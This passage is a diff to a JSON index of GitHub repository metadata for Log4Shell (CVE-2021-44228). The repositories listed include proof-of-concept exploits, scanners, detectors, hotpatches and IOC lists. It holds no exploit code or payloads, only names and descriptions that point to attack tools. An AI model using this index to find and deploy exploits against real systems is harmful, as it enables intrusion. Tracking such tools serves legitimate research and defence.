+ "created_at": "2021-12-11T15:48:03Z",
+ "updated_at": "2022-01-08T19:26:15Z",
+ "pushed_at": "2022-02-07T20:44:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "jndi-exploit",
+ "log4j",
+ "minecraft-mod"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437327955,
+ "name": "Log4j-Rec-CVE-2021-44228",
+ "full_name": "zhangxvx\/Log4j-Rec-CVE-2021-44228",
+ "owner": {
+ "login": "zhangxvx",
+ "id": 19684449,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19684449?v=4",
+ "html_url": "https:\/\/github.com\/zhangxvx"
+ },
+ "html_url": "https:\/\/github.com\/zhangxvx\/Log4j-Rec-CVE-2021-44228",
+ "description": "Apache Log4j CVE-2021-44228 漏洞复现",
+ "fork": false,
+ "created_at": "2021-12-11T16:08:34Z",
+ "updated_at": "2021-12-12T03:50:45Z",
+ "pushed_at": "2021-12-12T03:49:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437327995,
+ "name": "Log4j-CVE-Detect",
+ "full_name": "darkarnium\/Log4j-CVE-Detect",
+ "owner": {
+ "login": "darkarnium",
+ "id": 3048394,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3048394?v=4",
+ "html_url": "https:\/\/github.com\/darkarnium"
+ },
+ "html_url": "https:\/\/github.com\/darkarnium\/Log4j-CVE-Detect",
+ "description": "Detections for CVE-2021-44228 inside of nested binaries",
+ "fork": false,
+ "created_at": "2021-12-11T16:08:47Z",
+ "updated_at": "2024-05-12T04:21:53Z",
+ "pushed_at": "2021-12-18T22:20:25Z",
+ "stargazers_count": 35,
+ "watchers_count": 35,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "binary",
+ "cve-2021-44228",
+ "cve-2021-45046",
+ "detection",
+ "devops",
+ "python",
+ "sca",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 35,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437381453,
+ "name": "CVE-2021-44228_Example",
+ "full_name": "chilliwebs\/CVE-2021-44228_Example",
+ "owner": {
+ "login": "chilliwebs",
+ "id": 6079309,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6079309?v=4",
+ "html_url": "https:\/\/github.com\/chilliwebs"
+ },
+ "html_url": "https:\/\/github.com\/chilliwebs\/CVE-2021-44228_Example",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-11T20:25:08Z",
+ "updated_at": "2022-01-03T13:51:27Z",
+ "pushed_at": "2021-12-15T20:27:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437397347,
+ "name": "f5-waf-enforce-sig-CVE-2021-44228",
+ "full_name": "irgoncalves\/f5-waf-enforce-sig-CVE-2021-44228",
+ "owner": {
+ "login": "irgoncalves",
+ "id": 23459099,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23459099?v=4",
+ "html_url": "https:\/\/github.com\/irgoncalves"
+ },
+ "html_url": "https:\/\/github.com\/irgoncalves\/f5-waf-enforce-sig-CVE-2021-44228",
+ "description": "This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device",
+ "fork": false,
+ "created_at": "2021-12-11T21:59:19Z",
+ "updated_at": "2024-04-07T21:37:20Z",
+ "pushed_at": "2021-12-15T18:56:57Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437407625,
+ "name": "log4j-docker-vaccine",
+ "full_name": "jeffbryner\/log4j-docker-vaccine",
+ "owner": {
+ "login": "jeffbryner",
+ "id": 566889,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/566889?v=4",
+ "html_url": "https:\/\/github.com\/jeffbryner"
+ },
+ "html_url": "https:\/\/github.com\/jeffbryner\/log4j-docker-vaccine",
+ "description": "docker compose solution to run a vaccine environment for the log4j2 vulnerability CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-11T23:06:23Z",
+ "updated_at": "2022-05-22T02:50:49Z",
+ "pushed_at": "2021-12-12T00:15:23Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437419010,
+ "name": "log4j-detector",
+ "full_name": "mergebase\/log4j-detector",
+ "owner": {
+ "login": "mergebase",
+ "id": 73667397,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73667397?v=4",
+ "html_url": "https:\/\/github.com\/mergebase"
+ },
+ "html_url": "https:\/\/github.com\/mergebase\/log4j-detector",
+ "description": "A public open sourced tool. Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too! TAG_OS_TOOL, OWNER_KELLY, DC_PUBLIC",
+ "fork": false,
+ "created_at": "2021-12-12T00:29:03Z",
+ "updated_at": "2024-05-27T00:43:09Z",
+ "pushed_at": "2022-03-10T18:44:50Z",
+ "stargazers_count": 631,
+ "watchers_count": 631,
+ "has_discussions": false,
+ "forks_count": 98,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "cve-2021-45046",
+ "cve-2021-45105",
+ "cybersecurity",
+ "detector",
+ "log4j",
+ "log4shell",
+ "pentest",
+ "sca",
+ "scanner",
+ "vulnerability-scanner"
+ ],
+ "visibility": "public",
+ "forks": 98,
+ "watchers": 631,
+ "score": 0,
+ "subscribers_count": 28
+ },
+ {
+ "id": 437426248,
+ "name": "log4j2-rce-poc",
+ "full_name": "unlimitedsola\/log4j2-rce-poc",
+ "owner": {
+ "login": "unlimitedsola",
+ "id": 3632663,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3632663?v=4",
+ "html_url": "https:\/\/github.com\/unlimitedsola"
+ },
+ "html_url": "https:\/\/github.com\/unlimitedsola\/log4j2-rce-poc",
+ "description": "A bare minimum proof-of-concept for Log4j2 JNDI RCE vulnerability (CVE-2021-44228\/Log4Shell).",
+ "fork": false,
+ "created_at": "2021-12-12T01:23:45Z",
+ "updated_at": "2023-04-17T21:10:43Z",
+ "pushed_at": "2021-12-12T09:59:26Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j2",
+ "log4shell",
+ "poc",
+ "proof-of-concept",
+ "rce",
+ "remote-code-execution"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437426359,
+ "name": "log4j2burpscanner",
+ "full_name": "Jeromeyoung\/log4j2burpscanner",
+ "owner": {
+ "login": "Jeromeyoung",
+ "id": 39945364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4",
+ "html_url": "https:\/\/github.com\/Jeromeyoung"
+ },
+ "html_url": "https:\/\/github.com\/Jeromeyoung\/log4j2burpscanner",
+ "description": "CVE-2021-44228,log4j2 burp插件 Java版本,dnslog选取了非dnslog.cn域名",
+ "fork": false,
+ "created_at": "2021-12-12T01:24:39Z",
+ "updated_at": "2024-05-18T07:58:20Z",
+ "pushed_at": "2021-12-11T10:39:41Z",
+ "stargazers_count": 29,
+ "watchers_count": 29,
+ "has_discussions": false,
+ "forks_count": 43,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 43,
+ "watchers": 29,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437426386,
+ "name": "hotpatch-for-apache-log4j2",
+ "full_name": "corretto\/hotpatch-for-apache-log4j2",
+ "owner": {
+ "login": "corretto",
+ "id": 44104058,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44104058?v=4",
+ "html_url": "https:\/\/github.com\/corretto"
+ },
+ "html_url": "https:\/\/github.com\/corretto\/hotpatch-for-apache-log4j2",
+ "description": "An agent to hotpatch the log4j RCE from CVE-2021-44228.",
+ "fork": false,
+ "created_at": "2021-12-12T01:24:51Z",
+ "updated_at": "2024-05-10T10:43:30Z",
+ "pushed_at": "2022-10-24T02:25:53Z",
+ "stargazers_count": 495,
+ "watchers_count": 495,
+ "has_discussions": false,
+ "forks_count": 71,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 71,
+ "watchers": 495,
+ "score": 0,
+ "subscribers_count": 25
+ },
+ {
+ "id": 437438829,
+ "name": "python-log4rce",
+ "full_name": "alexandre-lavoie\/python-log4rce",
+ "owner": {
+ "login": "alexandre-lavoie",
+ "id": 36684879,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36684879?v=4",
+ "html_url": "https:\/\/github.com\/alexandre-lavoie"
+ },
+ "html_url": "https:\/\/github.com\/alexandre-lavoie\/python-log4rce",
+ "description": "An All-In-One Pure Python PoC for CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-12T02:57:49Z",
+ "updated_at": "2024-05-10T10:43:30Z",
+ "pushed_at": "2021-12-16T18:34:46Z",
+ "stargazers_count": 174,
+ "watchers_count": 174,
+ "has_discussions": false,
+ "forks_count": 29,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cli",
+ "cve-2021-44228",
+ "log4j",
+ "python",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 29,
+ "watchers": 174,
+ "score": 0,
+ "subscribers_count": 10
+ },
+ {
+ "id": 437439106,
+ "name": "Log4Shell_CVE-2021-44228_related_attacks_IOCs",
+ "full_name": "RedDrip7\/Log4Shell_CVE-2021-44228_related_attacks_IOCs",
+ "owner": {
+ "login": "RedDrip7",
+ "id": 51360411,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51360411?v=4",
+ "html_url": "https:\/\/github.com\/RedDrip7"
+ },
+ "html_url": "https:\/\/github.com\/RedDrip7\/Log4Shell_CVE-2021-44228_related_attacks_IOCs",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-12T02:59:54Z",
+ "updated_at": "2024-01-18T01:55:48Z",
+ "pushed_at": "2021-12-15T10:19:51Z",
+ "stargazers_count": 44,
+ "watchers_count": 44,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 44,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 437440782,
+ "name": "CVE-2021-44228-Demo",
+ "full_name": "mzlogin\/CVE-2021-44228-Demo",
+ "owner": {
+ "login": "mzlogin",
+ "id": 1646590,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1646590?v=4",
+ "html_url": "https:\/\/github.com\/mzlogin"
+ },
+ "html_url": "https:\/\/github.com\/mzlogin\/CVE-2021-44228-Demo",
+ "description": "Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP",
+ "fork": false,
+ "created_at": "2021-12-12T03:11:14Z",
+ "updated_at": "2023-09-28T11:34:02Z",
+ "pushed_at": "2021-12-12T03:22:59Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "jndi",
+ "ldap",
+ "rmi"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437451451,
+ "name": "vcenter-log4j",
+ "full_name": "blake-fm\/vcenter-log4j",
+ "owner": {
+ "login": "blake-fm",
+ "id": 89286531,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89286531?v=4",
+ "html_url": "https:\/\/github.com\/blake-fm"
+ },
+ "html_url": "https:\/\/github.com\/blake-fm\/vcenter-log4j",
+ "description": "Script to apply official workaround for VMware vCenter log4j vulnerability CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-12T04:23:10Z",
+ "updated_at": "2022-08-17T05:28:16Z",
+ "pushed_at": "2021-12-15T12:17:19Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437479258,
+ "name": "CVE-2021-44228-Apache-Log4j-Rce__review",
+ "full_name": "creamIcec\/CVE-2021-44228-Apache-Log4j-Rce__review",
+ "owner": {
+ "login": "creamIcec",
+ "id": 42510470,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42510470?v=4",
+ "html_url": "https:\/\/github.com\/creamIcec"
+ },
+ "html_url": "https:\/\/github.com\/creamIcec\/CVE-2021-44228-Apache-Log4j-Rce__review",
+ "description": "log4j2漏洞复现",
+ "fork": false,
+ "created_at": "2021-12-12T07:20:03Z",
+ "updated_at": "2021-12-12T07:20:03Z",
+ "pushed_at": "2021-12-12T07:20:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437501121,
+ "name": "cve-2021-44228-helpers",
+ "full_name": "uint0\/cve-2021-44228-helpers",
+ "owner": {
+ "login": "uint0",
+ "id": 11325389,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11325389?v=4",
+ "html_url": "https:\/\/github.com\/uint0"
+ },
+ "html_url": "https:\/\/github.com\/uint0\/cve-2021-44228-helpers",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-12T09:21:09Z",
+ "updated_at": "2021-12-13T00:01:22Z",
+ "pushed_at": "2021-12-13T00:01:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437511755,
+ "name": "apache-log4j-poc",
+ "full_name": "RK800-DEV\/apache-log4j-poc",
+ "owner": {
+ "login": "RK800-DEV",
+ "id": 85429713,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85429713?v=4",
+ "html_url": "https:\/\/github.com\/RK800-DEV"
+ },
+ "html_url": "https:\/\/github.com\/RK800-DEV\/apache-log4j-poc",
+ "description": "CVE-2021-44228(Apache Log4j Remote Code Execution)",
+ "fork": false,
+ "created_at": "2021-12-12T10:17:13Z",
+ "updated_at": "2021-12-12T10:17:47Z",
+ "pushed_at": "2021-12-12T10:17:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437512798,
+ "name": "log4j-CVE-2021-44228",
+ "full_name": "sud0x00\/log4j-CVE-2021-44228",
+ "owner": {
+ "login": "sud0x00",
+ "id": 91898207,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91898207?v=4",
+ "html_url": "https:\/\/github.com\/sud0x00"
+ },
+ "html_url": "https:\/\/github.com\/sud0x00\/log4j-CVE-2021-44228",
+ "description": "CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-12T10:22:45Z",
+ "updated_at": "2023-11-07T01:40:01Z",
+ "pushed_at": "2021-12-12T14:08:08Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-44228",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437518939,
+ "name": "CVE-2021-44228-docker-example",
+ "full_name": "DiCanio\/CVE-2021-44228-docker-example",
+ "owner": {
+ "login": "DiCanio",
+ "id": 6052859,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6052859?v=4",
+ "html_url": "https:\/\/github.com\/DiCanio"
+ },
+ "html_url": "https:\/\/github.com\/DiCanio\/CVE-2021-44228-docker-example",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-12T10:53:15Z",
+ "updated_at": "2021-12-13T03:58:51Z",
+ "pushed_at": "2021-12-13T00:03:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437525008,
+ "name": "cve-2021-44228-minecraft-poc",
+ "full_name": "myyxl\/cve-2021-44228-minecraft-poc",
+ "owner": {
+ "login": "myyxl",
+ "id": 22593897,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22593897?v=4",
+ "html_url": "https:\/\/github.com\/myyxl"
+ },
+ "html_url": "https:\/\/github.com\/myyxl\/cve-2021-44228-minecraft-poc",
+ "description": "Log4J CVE-2021-44228 Minecraft PoC",
+ "fork": false,
+ "created_at": "2021-12-12T11:22:51Z",
+ "updated_at": "2022-02-15T06:41:00Z",
+ "pushed_at": "2021-12-12T11:34:50Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j",
+ "log4shell",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437525445,
+ "name": "Awesome-CVE-2021-44228",
+ "full_name": "RrUZi\/Awesome-CVE-2021-44228",
+ "owner": {
+ "login": "RrUZi",
+ "id": 43235635,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43235635?v=4",
+ "html_url": "https:\/\/github.com\/RrUZi"
+ },
+ "html_url": "https:\/\/github.com\/RrUZi\/Awesome-CVE-2021-44228",
+ "description": "An awesome curated list of repos for CVE-2021-44228. ``Apache Log4j 2``",
+ "fork": false,
+ "created_at": "2021-12-12T11:25:00Z",
+ "updated_at": "2021-12-12T11:35:58Z",
+ "pushed_at": "2021-12-12T11:33:43Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j2"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437525803,
+ "name": "CVE-2021-44228",
+ "full_name": "future-client\/CVE-2021-44228",
+ "owner": {
+ "login": "future-client",
+ "id": 122487775,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122487775?v=4",
+ "html_url": "https:\/\/github.com\/future-client"
+ },
+ "html_url": "https:\/\/github.com\/future-client\/CVE-2021-44228",
+ "description": "Abuse Log4J CVE-2021-44228 to patch CVE-2021-44228 in vulnerable Minecraft game sessions to prevent exploitation in the session :) ",
+ "fork": false,
+ "created_at": "2021-12-12T11:26:42Z",
+ "updated_at": "2024-06-06T12:50:41Z",
+ "pushed_at": "2021-12-12T17:37:11Z",
+ "stargazers_count": 67,
+ "watchers_count": 67,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "exploit",
+ "jndi",
+ "ldap",
+ "log4j",
+ "minecraft",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 67,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437526168,
+ "name": "Log4JShell-Bytecode-Detector",
+ "full_name": "CodeShield-Security\/Log4JShell-Bytecode-Detector",
+ "owner": {
+ "login": "CodeShield-Security",
+ "id": 60257643,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60257643?v=4",
+ "html_url": "https:\/\/github.com\/CodeShield-Security"
+ },
+ "html_url": "https:\/\/github.com\/CodeShield-Security\/Log4JShell-Bytecode-Detector",
+ "description": "Local Bytecode Scanner for the Log4JShell Vulnerability (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-12T11:28:34Z",
+ "updated_at": "2023-05-10T20:58:01Z",
+ "pushed_at": "2022-02-23T19:10:53Z",
+ "stargazers_count": 50,
+ "watchers_count": 50,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bytecode",
+ "cve-2021-44228",
+ "log4j2",
+ "log4jshell",
+ "log4shell",
+ "scanner",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 50,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 437526871,
+ "name": "log4j-poc",
+ "full_name": "Crane-Mocker\/log4j-poc",
+ "owner": {
+ "login": "Crane-Mocker",
+ "id": 46662246,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46662246?v=4",
+ "html_url": "https:\/\/github.com\/Crane-Mocker"
+ },
+ "html_url": "https:\/\/github.com\/Crane-Mocker\/log4j-poc",
+ "description": "Poc of log4j2 (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-12T11:31:45Z",
+ "updated_at": "2023-01-27T21:00:19Z",
+ "pushed_at": "2021-12-12T12:19:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437536404,
+ "name": "divd-2021-00038--log4j-scanner",
+ "full_name": "dtact\/divd-2021-00038--log4j-scanner",
+ "owner": {
+ "login": "dtact",
+ "id": 65305480,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65305480?v=4",
+ "html_url": "https:\/\/github.com\/dtact"
+ },
+ "html_url": "https:\/\/github.com\/dtact\/divd-2021-00038--log4j-scanner",
+ "description": "Scan systems and docker images for potential log4j vulnerabilities. Able to patch (remove JndiLookup.class) from layered archives. Will detect in-depth (layered archives jar\/zip\/tar\/war and scans for vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105). Binaries for Windows, Linux and OsX, but can be build on each platform supported by supported Golang.",
+ "fork": false,
+ "created_at": "2021-12-12T12:16:07Z",
+ "updated_at": "2023-08-09T21:34:19Z",
+ "pushed_at": "2021-12-28T22:21:52Z",
+ "stargazers_count": 50,
+ "watchers_count": 50,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 50,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 437538957,
+ "name": "CVE-2021-44228-log4Shell",
+ "full_name": "kali-dass\/CVE-2021-44228-log4Shell",
+ "owner": {
+ "login": "kali-dass",
+ "id": 28717904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28717904?v=4",
+ "html_url": "https:\/\/github.com\/kali-dass"
+ },
+ "html_url": "https:\/\/github.com\/kali-dass\/CVE-2021-44228-log4Shell",
+ "description": "Sample log4j shell exploit",
+ "fork": false,
+ "created_at": "2021-12-12T12:27:39Z",
+ "updated_at": "2022-09-07T20:25:29Z",
+ "pushed_at": "2021-12-13T16:37:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437546559,
+ "name": "log4j2-CVE-2021-44228",
+ "full_name": "pravin-pp\/log4j2-CVE-2021-44228",
+ "owner": {
+ "login": "pravin-pp",
+ "id": 12995541,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12995541?v=4",
+ "html_url": "https:\/\/github.com\/pravin-pp"
+ },
+ "html_url": "https:\/\/github.com\/pravin-pp\/log4j2-CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-12T13:00:38Z",
+ "updated_at": "2021-12-13T04:00:49Z",
+ "pushed_at": "2021-12-12T13:25:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437550473,
+ "name": "Exploitation-of-Log4j2-CVE-2021-44228",
+ "full_name": "Malwar3Ninja\/Exploitation-of-Log4j2-CVE-2021-44228",
+ "owner": {
+ "login": "Malwar3Ninja",
+ "id": 34618086,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34618086?v=4",
+ "html_url": "https:\/\/github.com\/Malwar3Ninja"
+ },
+ "html_url": "https:\/\/github.com\/Malwar3Ninja\/Exploitation-of-Log4j2-CVE-2021-44228",
+ "description": "IP addresses exploiting recent log4j2 vulnerability CVE-2021-44228 ",
+ "fork": false,
+ "created_at": "2021-12-12T13:17:18Z",
+ "updated_at": "2024-05-21T18:02:25Z",
+ "pushed_at": "2021-12-19T12:42:02Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437551037,
+ "name": "docker-log4shell",
+ "full_name": "urholaukkarinen\/docker-log4shell",
+ "owner": {
+ "login": "urholaukkarinen",
+ "id": 5576504,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5576504?v=4",
+ "html_url": "https:\/\/github.com\/urholaukkarinen"
+ },
+ "html_url": "https:\/\/github.com\/urholaukkarinen\/docker-log4shell",
+ "description": "Dockerized Go app for testing the CVE-2021-44228 vulnerability",
+ "fork": false,
+ "created_at": "2021-12-12T13:19:50Z",
+ "updated_at": "2021-12-12T13:23:50Z",
+ "pushed_at": "2021-12-12T13:21:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437553138,
+ "name": "scan4log4j",
+ "full_name": "ssl\/scan4log4j",
+ "owner": {
+ "login": "ssl",
+ "id": 25695071,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25695071?v=4",
+ "html_url": "https:\/\/github.com\/ssl"
+ },
+ "html_url": "https:\/\/github.com\/ssl\/scan4log4j",
+ "description": "Python script that sends CVE-2021-44228 log4j payload requests to url list",
+ "fork": false,
